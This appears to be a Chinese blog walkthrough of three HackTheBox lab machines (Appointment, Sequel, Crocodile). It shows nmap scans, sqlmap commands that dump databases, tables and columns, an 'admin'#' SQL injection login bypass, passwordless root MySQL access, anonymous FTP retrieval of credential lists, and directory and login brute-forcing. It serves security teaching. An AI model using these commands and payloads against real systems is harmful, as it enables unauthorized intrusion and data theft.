本文我们接着前期文章来学习hackthebox相关的靶场关卡。
TIER0
我们在直播过程中已经为大家进行了讲解,本文单独讲解 TIER1
的关卡吧。
Appointment
这关考察的是sql注入相关方面的知识,我们首先对其进行端口扫描。
nmap -T4 -A 10.129.23.47
如上,我们可以到了只起开了
80
端口,毫无疑问应该是个web站长。访问IP如下。
既然是存在sql注入,我们在burp中进行抓包,将数据放到sqlmap中进行扫描即可。
将数据包保存为txt文件,然后执行下面命令。
sqlmap -r "22.txt" --dbs
如下,成功得到数据库信息。
表信息
sqlmap -r "22.txt" -D appdb --tables
表字段
sqlmap -r "22.txt" -D appdb -T users --columns
当然,除了sqlmap跑之外还有更简单的方法,我们利用万能账号
直接登录就行了。如admin'#
Sequle
同样,我们还是选对设备进行端口扫描。
nmap -sC -sV 10.129.95.232
我们可以看到,目标开启了3306
mysql端口。
对于既然目标来气了mysql相关端口,我们可以尝试暴力破解或者匿名登录。执行下面命令
mysql -h 10.129.95.232 -u root -p
回车后,发现可以直接登录。
show databases; #显示数据库
use htb; #选择数据库
show tables; #显示表
select * from config; #查询表
如下,成功得到flag
Crocodile
同样,启动靶场后我们对目标进行端口扫描。
nmap -sC -sV 10.129.104.219
如下,目标开启了
21
80
端口。并且21
端口可以匿名登录。我们首先登录ftp来看看。
下载文件
get allowed.userlist # 用户列表
get allowed.userlist.passwd # 密码列表
打开两个文件,疑似存放了账号和密码。我们访问80
端口。
利用后台扫描工具扫描站点后台地址
dirb http://10.129.104.219 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -X .php
用下载后的账号和密码进行登录,这里我用
burp
抓包后,进行枚举破解。
成功得到
flag
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):玩转HackTheBox靶场(二)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论